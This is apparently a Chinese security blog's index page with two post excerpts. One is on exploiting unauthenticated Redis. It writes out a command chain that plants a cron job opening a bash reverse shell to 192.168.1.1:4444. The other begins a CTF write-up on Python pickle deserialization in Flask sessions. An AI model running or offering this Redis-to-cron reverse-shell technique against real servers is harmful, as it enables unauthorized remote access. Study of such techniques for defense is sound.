刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2019年12月19日
redis未授权漏洞和主从复制rce漏洞利用
未授权无需认证访问内部数据库。利用计划任务反弹shell12345redis-cli -h 192.168.2.6set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave获取webshel
作者:admin , 分类:内网渗透 , 浏览:692 , 评论:0
2019年12月12日
SWPU CTF2019 Web2 WriteUp (Python反序列化,redis,session)
参考https://segmentfault.com/a/1190000013099825Python 反序列化安全问题(一)这一段时间使用flask做web开发,使用了redis存储session,阅读了flask_session源码,发现在存储session到redis过程中,利用了cPickle模块进行序列化以及反序列化;正好根据该样例学习一波Python反序列化相关的安全问题,不足之处请各位表哥指出。一、基础知识讲解1.1 cPickle模块Python中主要是用cPickle和pick
作者:admin , 分类:CTF , 浏览:605 , 评论:0
- 搜索
- 文章归档
- 网站收藏
- 友情链接
-
